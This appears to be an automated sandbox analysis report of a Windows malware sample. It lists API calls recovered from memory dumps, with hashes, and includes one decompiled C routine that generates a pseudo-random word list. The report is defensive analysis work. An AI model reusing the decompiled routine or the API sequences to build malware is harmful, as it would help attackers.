                                                            • StrChrA.SHLWAPI(00000001,00000020,?,?,?,04573BE7,00000000,?,0458BAA8,?,?,0458C140), ref: 045786E6
                                                              • Part of subcall function 045829DE: lstrlen.KERNEL32(?,04562DC6,00000000,00000000,?,0457DF3C,?,?,00000014,04562DC6,?,?), ref: 045829F0
                                                              • Part of subcall function 045829DE: StrChrA.SHLWAPI(?,0000000D,?,0457DF3C,?,?,00000014,04562DC6,?,?), ref: 04582A28
                                                            • RtlAllocateHeap.NTDLL(00000000,01000000,00000000), ref: 04578726
                                                            • memcpy.NTDLL(00000000,?,00000007,?,?,?,04573BE7,00000000,?,0458BAA8,?), ref: 04578753
                                                            • memcpy.NTDLL(00000000,0458C140,0458C140,00000000,?,00000007,?,?,?,04573BE7,00000000,?,0458BAA8,?), ref: 04578762
                                                            • memcpy.NTDLL(0458C140,?,?,00000000,0458C140,0458C140,00000000,?,00000007,?,?,?,04573BE7,00000000,?,0458BAA8), ref: 04578774
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                            • String ID:
                                                            • API String ID: 1819133394-0
                                                            • Opcode ID: 4596cdb95fd5d2c974949cd248dca389dbe1da7c93dd435d9887e765fa6ff2d4
                                                            • Instruction ID: 8dc34e1345003fe5edd193635d9cd373e36a7cfd32ba864016ad2f4369ccd5d3
                                                            • Opcode Fuzzy Hash: 4596cdb95fd5d2c974949cd248dca389dbe1da7c93dd435d9887e765fa6ff2d4
                                                            • Instruction Fuzzy Hash: 25217C72500209BFDB11AF99DC84E9A7BACFF08754F044065F905AB251EA75FE44ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 04579F08
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04579F19
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 04579F34
                                                            • GetLastError.KERNEL32 ref: 04579F4A
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04579F5C
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04579F71
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                                            • String ID:
                                                            • API String ID: 1822509305-0
                                                            • Opcode ID: 9d9194ef5b05bc1f040665181a0ec5b3965d073278765d61e0590ea611734474
                                                            • Instruction ID: 12c614da98e6f6e8440625fb08f7c0e0d87db0a4b9fdaf84527105ba7d9e393b
                                                            • Opcode Fuzzy Hash: 9d9194ef5b05bc1f040665181a0ec5b3965d073278765d61e0590ea611734474
                                                            • Instruction Fuzzy Hash: 5B116AB6901128FBDB226B96EC48CEF7F7EFF452A0B000025F505E2151DA359A55FBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 04583AD0
                                                            • _strupr.NTDLL ref: 04583B0B
                                                            • lstrlen.KERNEL32(00000000), ref: 04583B13
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 04583B52
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 04583B59
                                                            • GetLastError.KERNEL32 ref: 04583B61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                                                            • String ID:
                                                            • API String ID: 110452925-0
                                                            • Opcode ID: 55e3540ce5d7b1bdd550e30a17c241c7afea4d4c1b9aa8afe13497fb5d376403
                                                            • Instruction ID: 861188ba893557264acfec9e833e6e58def3c3ea939d22a4cf6a99aac5c6d676
                                                            • Opcode Fuzzy Hash: 55e3540ce5d7b1bdd550e30a17c241c7afea4d4c1b9aa8afe13497fb5d376403
                                                            • Instruction Fuzzy Hash: 371166B1600105EFDB117B75EC89D6A376DFBC8756F10141DF907F2040EE79A848A764
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,73BCF710), ref: 0457DC2D
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0457DC5B
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0457DC6D
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0457DC92
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0457DCAD
                                                            • RegCloseKey.ADVAPI32(?), ref: 0457DCB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                                            • String ID:
                                                            • API String ID: 170146033-0
                                                            • Opcode ID: b52ae9ced444af74a480551a91f65dd00ad03307c67dfcb79e2751ff2b496a9d
                                                            • Instruction ID: 96da1f43805ba2c9f38703d7f516e0bf4abcae54e5214df63ab09b510e394927
                                                            • Opcode Fuzzy Hash: b52ae9ced444af74a480551a91f65dd00ad03307c67dfcb79e2751ff2b496a9d
                                                            • Instruction Fuzzy Hash: D311FE76900108FFDB11DB95ED84CEE7BBDFB89604B104069F901E2115DB75AE49EB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,04563F0E,?,00000000,000000FF,?,00000F00), ref: 0456B87A
                                                            • lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,04563F0E,?,00000000,000000FF,?,00000F00), ref: 0456B881
                                                            • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0456B893
                                                            • _snprintf.NTDLL ref: 0456B8B9
                                                              • Part of subcall function 0457A976: memset.NTDLL ref: 0457A98B
                                                              • Part of subcall function 0457A976: lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 0457A9C4
                                                              • Part of subcall function 0457A976: wcstombs.NTDLL ref: 0457A9CE
                                                              • Part of subcall function 0457A976: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 0457A9FF
                                                              • Part of subcall function 0457A976: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA2B
                                                              • Part of subcall function 0457A976: TerminateProcess.KERNEL32(?,000003E5), ref: 0457AA41
                                                              • Part of subcall function 0457A976: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA55
                                                              • Part of subcall function 0457A976: CloseHandle.KERNEL32(?), ref: 0457AA88
                                                              • Part of subcall function 0457A976: CloseHandle.KERNEL32(?), ref: 0457AA8D
                                                            • _snprintf.NTDLL ref: 0456B8ED
                                                              • Part of subcall function 0457A976: GetLastError.KERNEL32 ref: 0457AA59
                                                              • Part of subcall function 0457A976: GetExitCodeProcess.KERNEL32(?,00000001), ref: 0457AA79
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0456B90A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                                            • String ID:
                                                            • API String ID: 1481739438-0
                                                            • Opcode ID: e3b2c383b36711710762a0edbab6f7a9c0b181c578b799137a62f8f9e57b500a
                                                            • Instruction ID: a6da920b1020f7a848eb43b1a66ccf0a4db35c101c1429be1784dcbf34f8feaf
                                                            • Opcode Fuzzy Hash: e3b2c383b36711710762a0edbab6f7a9c0b181c578b799137a62f8f9e57b500a
                                                            • Instruction Fuzzy Hash: AE11BE72500229FFCF119F55EC84D9E3B6DFB08364F058019F909A7252CA35EE18EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • LoadLibraryA.KERNEL32(?,00000000,00000001,00000014,00000020,0457EF72,00000000,00000001), ref: 0457E46D
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457E48C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457E4A1
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457E4B7
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457E4CD
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0457E4E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$AllocateHeapLibraryLoad
                                                            • String ID:
                                                            • API String ID: 2486251641-0
                                                            • Opcode ID: 2321aaa0b1921d0defe4d4da17c1e6895c1279a7ef3a9cb56c7acf5b64097b4e
                                                            • Instruction ID: 46f04d15651992b94d5fe62286cf6175805e01fb81a7baab8e5daed4089f3980
                                                            • Opcode Fuzzy Hash: 2321aaa0b1921d0defe4d4da17c1e6895c1279a7ef3a9cb56c7acf5b64097b4e
                                                            • Instruction Fuzzy Hash: C111FBB2A0031B9F9721DB79ECC5D5773ECFB447447059569BA05E7202EE38E8099B70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(?,00000001,00000000,00000000,?,?,0456F9BD,04562B99,00000057,00000000), ref: 0456F3C9
                                                            • RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 0456F3DC
                                                            • lstrcpy.KERNEL32(00000008,?), ref: 0456F3FE
                                                            • GetLastError.KERNEL32(04575D99,00000000,00000000,?,?,0456F9BD,04562B99,00000057,00000000), ref: 0456F427
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,0456F9BD,04562B99,00000057,00000000), ref: 0456F43F
                                                            • CloseHandle.KERNEL32(00000000,04575D99,00000000,00000000,?,?,0456F9BD,04562B99,00000057,00000000), ref: 0456F448
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 2860611006-0
                                                            • Opcode ID: a6c36d133c94dc3858d61427c10d099a08ce86c8d99358adc8571b9ce9fb68cf
                                                            • Instruction ID: 4040b955583e6d8e2026f07ebd9addf57ef63de51e1b43d4308178f16861fcb5
                                                            • Opcode Fuzzy Hash: a6c36d133c94dc3858d61427c10d099a08ce86c8d99358adc8571b9ce9fb68cf
                                                            • Instruction Fuzzy Hash: 50116376500209EFDB109FA9E8888AE7BB8FB05365711442DF957E3640EB34AD45FB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                            • GetCurrentThreadId.KERNEL32 ref: 04579125
                                                            • GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                            • GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                            • lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 1175089793-0
                                                            • Opcode ID: 841ff6bd0c0da5e8991e51aaf5d603a01bf66c340207ad7da1b221083238e9e2
                                                            • Instruction ID: 6927a8fa283d9de9deea1ec926900a8792a2b9f564f04fef39b7cf6cb47d6934
                                                            • Opcode Fuzzy Hash: 841ff6bd0c0da5e8991e51aaf5d603a01bf66c340207ad7da1b221083238e9e2
                                                            • Instruction Fuzzy Hash: 85014876A00116ABA7115BA6AC8CD6B7BBCFFC5B847050029F905F7101DE68FC15A674
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLastmemset
                                                            • String ID: vids
                                                            • API String ID: 3276359510-3767230166
                                                            • Opcode ID: 34060d4e2c42758c98792dd34dfa87c321e34ca78eba25767d097a00d5ec2956
                                                            • Instruction ID: e291bae35577ee65f22b651623b5832324e9e369b0bc52e9ae296941dd62db05
                                                            • Opcode Fuzzy Hash: 34060d4e2c42758c98792dd34dfa87c321e34ca78eba25767d097a00d5ec2956
                                                            • Instruction Fuzzy Hash: 31813AB1D00219EFDF11DFA8D88499DBBB9FF48704F10856AE816EB250D730A945DF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memcpy.NTDLL(?,04576BB6,00000000,?,?,?,04576BB6,?,?,?,?,?), ref: 0456176F
                                                            • lstrlen.KERNEL32(04576BB6,?,?,?,04576BB6,?,?,?,?,?), ref: 0456178D
                                                            • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 045617FC
                                                            • lstrlen.KERNEL32(04576BB6,00000000,00000000,?,?,?,04576BB6,?,?,?,?,?), ref: 0456181D
                                                            • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 04561831
                                                            • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0456183A
                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 04561848
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlenmemcpy$FreeLocal
                                                            • String ID:
                                                            • API String ID: 1123625124-0
                                                            • Opcode ID: b57b6d85f10433f99b208c001940bd8c05b14cff3e882e718d77ddd06fb9372d
                                                            • Instruction ID: e2d9a39e787f6d669f7c20011e64f0c4700543d3084657aa5ece23dd00855764
                                                            • Opcode Fuzzy Hash: b57b6d85f10433f99b208c001940bd8c05b14cff3e882e718d77ddd06fb9372d
                                                            • Instruction Fuzzy Hash: 2841EA7280021AAFDF11DF65DC419DB3BA8FF142A4B054419FD15A7210EB35EE64ABE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memcpy.NTDLL(?,04575AB0,00000010,?,?,?,?,?,?,?,?,?,?,04583452,00000000,00000001), ref: 0457BEE0
                                                            • memcpy.NTDLL(00000000,00000001,04575AB0,0000011F), ref: 0457BF73
                                                            • GetLastError.KERNEL32(?,?,0000011F), ref: 0457BFCB
                                                            • GetLastError.KERNEL32 ref: 0457BFFD
                                                            • GetLastError.KERNEL32 ref: 0457C011
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04583452,00000000,00000001,04575AB0,?,04575AB0), ref: 0457C026
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$memcpy
                                                            • String ID:
                                                            • API String ID: 2760375183-0
                                                            • Opcode ID: 1faada624cec09325f144c53df1ad1800bb006b85370609e4e20ef983635d945
                                                            • Instruction ID: 6cb2ed41f17e4a23177a432fb45cbc40f60acac91323589edd6f9fd17ec1c6fc
                                                            • Opcode Fuzzy Hash: 1faada624cec09325f144c53df1ad1800bb006b85370609e4e20ef983635d945
                                                            • Instruction Fuzzy Hash: 3B514E71900209FFDB11DFA9EC84AAEBBB9FB44754F008429F911E6140E735AE54EF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • lstrcpy.KERNEL32(00000001,00000020), ref: 0456F324
                                                            • lstrcat.KERNEL32(00000001,00000020), ref: 0456F339
                                                            • lstrcmp.KERNEL32(00000000,00000001), ref: 0456F350
                                                            • lstrlen.KERNEL32(00000001), ref: 0456F374
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3214092121-3916222277
                                                            • Opcode ID: a0ce8e14722b1f72c22f3237418ff9115b78dad35c20417365e1b693d4dd8a31
                                                            • Instruction ID: ec556ed5c16516401e84954e222dd5e2ea243534640961a7a294122742a77ab9
                                                            • Opcode Fuzzy Hash: a0ce8e14722b1f72c22f3237418ff9115b78dad35c20417365e1b693d4dd8a31
                                                            • Instruction Fuzzy Hash: 0C518136E00218EFDF11CF99E9846ADBBB6FF45314F15805AE816AB205CB70BA51EF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 22%
                                                            			E00DD1ADC(signed int __eax, signed int _a4, signed int _a8) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				intOrPtr _v16;
                                                            				signed int _v20;
                                                            				intOrPtr _t81;
                                                            				char _t83;
                                                            				signed int _t90;
                                                            				signed int _t97;
                                                            				signed int _t99;
                                                            				char _t101;
                                                            				unsigned int _t102;
                                                            				intOrPtr _t103;
                                                            				char* _t107;
                                                            				signed int _t110;
                                                            				signed int _t113;
                                                            				signed int _t118;
                                                            				signed int _t122;
                                                            				intOrPtr _t124;
                                                            
                                                            				_t102 = _a8;
                                                            				_t118 = 0;
                                                            				_v20 = __eax;
                                                            				_t122 = (_t102 >> 2) + 1;
                                                            				_v8 = 0;
                                                            				_a8 = 0;
                                                            				_t81 = E00DD77D7(_t122 << 2);
                                                            				_v16 = _t81;
                                                            				if(_t81 == 0) {
                                                            					_push(8);
                                                            					_pop(0);
                                                            					L37:
                                                            					return 0;
                                                            				}
                                                            				_t107 = _a4;
                                                            				_a4 = _t102;
                                                            				_t113 = 0;
                                                            				while(1) {
                                                            					_t83 =  *_t107;
                                                            					if(_t83 == 0) {
                                                            						break;
                                                            					}
                                                            					if(_t83 == 0xd || _t83 == 0xa) {
                                                            						if(_t118 != 0) {
                                                            							if(_t118 > _v8) {
                                                            								_v8 = _t118;
                                                            							}
                                                            							_a8 = _a8 + 1;
                                                            							_t118 = 0;
                                                            						}
                                                            						 *_t107 = 0;
                                                            						goto L16;
                                                            					} else {
                                                            						if(_t118 != 0) {
                                                            							L10:
                                                            							_t118 = _t118 + 1;
                                                            							L16:
                                                            							_t107 = _t107 + 1;
                                                            							_t15 =  &_a4;
                                                            							 *_t15 = _a4 - 1;
                                                            							if( *_t15 != 0) {
                                                            								continue;
                                                            							}
                                                            							break;
                                                            						}
                                                            						if(_t113 == _t122) {
                                                            							L21:
                                                            							if(_a8 <= 0x20) {
                                                            								_push(0xb);
                                                            								L34:
                                                            								_pop(0);
                                                            								L35:
                                                            								E00DD77EC(_v16);
                                                            								goto L37;
                                                            							}
                                                            							_t103 = E00DD77D7((_v8 + _v8 + 5) * _a8 + 4);
                                                            							if(_t103 == 0) {
                                                            								_push(8);
                                                            								goto L34;
                                                            							}
                                                            							_t90 = _a8;
                                                            							_a4 = _a4 & 0x00000000;
                                                            							_v8 = _v8 & 0x00000000;
                                                            							_t124 = _t103 + _t90 * 4;
                                                            							if(_t90 <= 0) {
                                                            								L31:
                                                            								 *0xdda2cc = _t103;
                                                            								goto L35;
                                                            							}
                                                            							do {
                                                            								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                            								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                            								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                            								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                            								_v12 = _v12 & 0x00000000;
                                                            								if(_a4 <= 0) {
                                                            									goto L30;
                                                            								} else {
                                                            									goto L26;
                                                            								}
                                                            								while(1) {
                                                            									L26:
                                                            									_t99 = _v12;
                                                            									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
                                                            									if(_t99 == 0) {
                                                            										break;
                                                            									}
                                                            									_v12 = _v12 + 1;
                                                            									if(_v12 < _a4) {
                                                            										continue;
                                                            									}
                                                            									goto L30;
                                                            								}
                                                            								_v8 = _v8 - 1;
                                                            								L30:
                                                            								_t97 = _a4;
                                                            								_a4 = _a4 + 1;
                                                            								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                            								__imp__(_t124);
                                                            								_v8 = _v8 + 1;
                                                            								_t124 = _t124 + _t97 + 1;
                                                            							} while (_v8 < _a8);
                                                            							goto L31;
                                                            						}
                                                            						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                            						_t101 = _t83;
                                                            						if(_t83 - 0x61 <= 0x19) {
                                                            							_t101 = _t101 - 0x20;
                                                            						}
                                                            						 *_t107 = _t101;
                                                            						_t113 = _t113 + 1;
                                                            						goto L10;
                                                            					}
                                                            				}
                                                            				if(_t118 != 0) {
                                                            					if(_t118 > _v8) {
                                                            						_v8 = _t118;
                                                            					}
                                                            					_a8 = _a8 + 1;
                                                            				}
                                                            				goto L21;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00DD1BD9
                                                            • lstrcat.KERNEL32(69B25F45,00000020), ref: 00DD1BEE
                                                            • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00DD1C05
                                                            • lstrlen.KERNEL32(69B25F45), ref: 00DD1C29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3214092121-3916222277
                                                            • Opcode ID: 799f44b36738f1e0cd91980f2a18ac1563a670e4520ed468b42d2500eaa5fe44
                                                            • Instruction ID: 566bf09b9c64c434ada29bddf567b048eeee0278b5076a0a70aadd814e841f05
                                                            • Opcode Fuzzy Hash: 799f44b36738f1e0cd91980f2a18ac1563a670e4520ed468b42d2500eaa5fe44
                                                            • Instruction Fuzzy Hash: 9651BF39A00218FBDF10DF99C8846ADFBBAFF56314F19805BE8599B311D730AA41CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04562B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,770F4620,00000000,00000000,0456114F,?), ref: 04562B66
                                                              • Part of subcall function 04562B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04562B83
                                                            • lstrlenW.KERNEL32(00000000,00000000,73B006E0,?,?,80000001,?), ref: 0457F0C7
                                                            • lstrlenW.KERNEL32(00000008), ref: 0457F0CE
                                                            • lstrlenW.KERNEL32(?,?), ref: 0457F0EA
                                                            • lstrlen.KERNEL32(?,?,00000000), ref: 0457F164
                                                            • lstrlenW.KERNEL32(?), ref: 0457F170
                                                            • wsprintfA.USER32 ref: 0457F19E
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
                                                            • String ID:
                                                            • API String ID: 3384896299-0
                                                            • Opcode ID: b3e7adb211b0215be096b2982fa1449ed5636e48650079af329b478b5ec97a29
                                                            • Instruction ID: 1d0c16c17d8e2534da2e3c03e84365eb9496c1b45a8210d0956b9f7885f5d6f7
                                                            • Opcode Fuzzy Hash: b3e7adb211b0215be096b2982fa1449ed5636e48650079af329b478b5ec97a29
                                                            • Instruction Fuzzy Hash: 6541407690010AEFDB01EFA9DC84D9E7BB9FF44204B054469F915E7211EF35E914AB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 045624F8
                                                            • memcpy.NTDLL(00000000,?,?), ref: 0456250B
                                                            • RtlEnterCriticalSection.NTDLL(0458C328), ref: 0456251C
                                                            • RtlLeaveCriticalSection.NTDLL(0458C328), ref: 04562531
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04562569
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHeapSection$AllocateEnterFreeLeavememcpy
                                                            • String ID:
                                                            • API String ID: 4069371292-0
                                                            • Opcode ID: f9ae3adfe5504b6fab831092b07d6b3f6631667ddc8de5ae1145bc212d1a17ba
                                                            • Instruction ID: 464e13ac6de13812a310bfa814516407ea7126216c8c1ada2ce3bc9dd5ae7f92
                                                            • Opcode Fuzzy Hash: f9ae3adfe5504b6fab831092b07d6b3f6631667ddc8de5ae1145bc212d1a17ba
                                                            • Instruction Fuzzy Hash: DD31E436017B20BBC7228A28FCD1DD7BBA9FF56726704855CF0D616501EA3478879BE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,0458522F,049B99A0,00000057), ref: 0457F5B0
                                                            • lstrlenW.KERNEL32(?,0458522F,049B99A0,00000057), ref: 0457F5C1
                                                            • lstrlenW.KERNEL32(?,0458522F,049B99A0,00000057), ref: 0457F5D3
                                                            • lstrlenW.KERNEL32(?,0458522F,049B99A0,00000057), ref: 0457F5E5
                                                            • lstrlenW.KERNEL32(?,0458522F,049B99A0,00000057), ref: 0457F5F7
                                                            • lstrlenW.KERNEL32(?,0458522F,049B99A0,00000057), ref: 0457F603
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID:
                                                            • API String ID: 1659193697-0
                                                            • Opcode ID: a0b3f4590bca720ae86f9937760f41cca70c867077460d4109f2b6cb9aee5779
                                                            • Instruction ID: d41170948dee8c174795cc16a76a5f03d3e5d380aa05d28f6c2c9051405ec67b
                                                            • Opcode Fuzzy Hash: a0b3f4590bca720ae86f9937760f41cca70c867077460d4109f2b6cb9aee5779
                                                            • Instruction Fuzzy Hash: B8412072E0020AAFDB10DFA9E8C0A6EB7F9FF98604B14887DD515E3210E774E905AB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04578D4F: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 04578D5B
                                                              • Part of subcall function 04578D4F: SetLastError.KERNEL32(000000B7,?,0457879F,?,?,00000000,?,?,?), ref: 04578D6C
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 045787BF
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04578897
                                                              • Part of subcall function 0456CDCB: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0456CDE5
                                                              • Part of subcall function 0456CDCB: CreateWaitableTimerA.KERNEL32(0458C1A8,00000001,?), ref: 0456CE02
                                                              • Part of subcall function 0456CDCB: GetLastError.KERNEL32(?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE13
                                                              • Part of subcall function 0456CDCB: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE53
                                                              • Part of subcall function 0456CDCB: SetWaitableTimer.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE72
